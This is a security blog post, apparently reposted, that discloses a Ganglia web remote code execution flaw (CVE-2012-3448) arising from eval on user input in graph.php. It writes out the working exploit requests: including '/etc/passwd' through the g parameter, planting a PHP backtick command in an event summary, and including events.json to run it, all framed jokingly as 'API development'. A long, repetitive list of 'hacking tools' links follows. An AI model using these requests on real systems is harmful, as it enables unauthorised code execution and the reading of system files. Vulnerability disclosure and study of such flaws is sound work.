Extending Your Ganglia Install With The Remote Code Execution API
Previously I had gone over a somewhat limited local file include in the Ganglia monitoring application (http://ganglia.info). The previous article can be found here -
http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html
I recently grabbed the latest version of the Ganglia web application to take a look to see if this issue has been fixed and I was pleasantly surprised... github is over here -
https://github.com/ganglia/ganglia-web
Looking at the code the following (abbreviated "graph.php") sequence can be found -
$graph = isset($_GET["g"]) ? sanitize ( $_GET["g"] ) : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');
I can only guess that this previous snippet of code was meant to be used as some sort of API put in place for remote developers, unfortunately it is slightly broken. For some reason when this API was being developed part of its interface was wrapped in the following function -
function sanitize ( $string ) {
return escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}
According the the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.
This limitation of the API means we cannot simply pass in a function like eval, exec, system, or use backticks to create our Ganglia extension. Our only option is to use PHP functions that do not require "(" or ")" a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) it looks like "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'
As you can see in the screen shot I have marked the "Event Summary" with "php here". When creating our API extension event we will fill in this event with the command we wish to run, see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=
This request will set up an "event" that will let everyone know who you are, that would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location "/var/lib/ganglia/conf/events.json" lets go ahead and include this file in our API call -
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'
As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.
Update: This issue has been assigned CVE-2012-3448Related posts
- Hacker Tools 2020
- Hacking Tools Github
- Hacker Search Tools
- Blackhat Hacker Tools
- What Is Hacking Tools
- Hacking Tools For Windows
- Hacker
- Pentest Tools Review
- How To Make Hacking Tools
- Hacking Tools Kit
- Nsa Hack Tools Download
- What Are Hacking Tools
- Pentest Tools Review
- Hacking Tools Windows
- Hacking Tools For Beginners
- Pentest Tools For Ubuntu
- Hack Tools Pc
- Hacker Tools Hardware
- Hacking Tools Name
- Hack Tools For Pc
- Hacker Hardware Tools
- Hack Tools For Mac
- Top Pentest Tools
- What Is Hacking Tools
- Pentest Tools Github
- Hack App
- Hacking Tools Software
- Hack Tools Online
- Free Pentest Tools For Windows
- Nsa Hack Tools
- Physical Pentest Tools
- Beginner Hacker Tools
- Pentest Reporting Tools
- Hacking Tools Download
- Pentest Tools Github
- Kik Hack Tools
- Pentest Tools Open Source
- New Hacker Tools
- How To Hack
- Hackers Toolbox
- Top Pentest Tools
- Hack Tools Mac
- Pentest Tools Apk
- Hacker Tools Free
- New Hacker Tools
- Hacking Tools Hardware
- Hacker Search Tools
- Hacking App
- Computer Hacker
- Tools Used For Hacking
- Pentest Tools Windows
- Hack Tool Apk No Root
- Pentest Tools Online
- Hacking Tools For Windows Free Download
- Hacking Tools For Windows Free Download
- Hacking Tools Windows
- Hacker Tools Mac
- How To Install Pentest Tools In Ubuntu
- Hacking Tools Windows
- Hacker Tools Windows
- Hacker Tools Hardware
- Growth Hacker Tools
- Hacker Tools List
- Hack Tools Online
- Hacking Tools For Mac
- Hacks And Tools
- Top Pentest Tools
- Hack Tools For Games
- Hacker Tools Software
- Pentest Tools Kali Linux
- Hack Tool Apk No Root
- Pentest Tools Github
- Hacking Tools Hardware
- Hacking Tools Windows 10
- Hacking Tools Windows
- Hacker Tools For Windows
- Free Pentest Tools For Windows
- Hack And Tools
- Hack Tools Online
- Hackrf Tools
- Pentest Tools Alternative
- Nsa Hack Tools
- How To Make Hacking Tools
- Hack Tools Download
- Hack Tools For Mac
- Pentest Tools
- Hacker Techniques Tools And Incident Handling
- Hack Tools For Pc
- Pentest Reporting Tools
- How To Make Hacking Tools
- Pentest Tools Find Subdomains
- Hacker Tools For Windows
- Tools Used For Hacking
- Free Pentest Tools For Windows
- Pentest Tools
- Pentest Reporting Tools
- Pentest Tools Find Subdomains
- Tools For Hacker
- Hacks And Tools
- Hacker Tools List
- Hacker Tools For Ios
- Pentest Tools Subdomain
- Hacking Tools Github
- Hack Tools Mac
- Wifi Hacker Tools For Windows
- Pentest Tools Subdomain
- Hacking Tools Online
- Pentest Tools For Mac
- Hacking Tools Software
- How To Install Pentest Tools In Ubuntu
- Hacker Tools For Pc
- Hacking Tools Windows 10
- What Is Hacking Tools
- Pentest Tools Open Source
- Hacking Tools Github
- Hacker Search Tools
- Hacker Techniques Tools And Incident Handling
- Pentest Tools Subdomain
- Bluetooth Hacking Tools Kali
- Hacker Tools List
- Hacker Security Tools
- Computer Hacker
- Computer Hacker
- Pentest Tools Download
- Hack Tools Github
- How To Hack
- Pentest Reporting Tools
- How To Hack
- Beginner Hacker Tools
- Beginner Hacker Tools
- Hacker Tools Free
- Pentest Tools Website Vulnerability
- Hacker Tools Online
- Computer Hacker
- Hack App
- Hackers Toolbox
- Pentest Tools Online
- Hacking Tools Hardware
- Hacking Tools For Beginners
- Hacker Tools 2020
- Hack Tools 2019
- Hack App
- Hacker Tools Hardware
- Ethical Hacker Tools
- Hacking Tools For Kali Linux
- Hackrf Tools
- Hacking Tools For Games
- Hacking Tools 2020
- Hacker Tool Kit
- Top Pentest Tools
- Hacker Hardware Tools
- Hack Apps
- Pentest Tools Port Scanner
- Hacker Tools Mac
- Hack Apps
Write admin description here..
Get Updates
Subscribe to our e-mail newsletter to receive updates.
Share This Post
Related posts
0 comentarios:
Publicar un comentario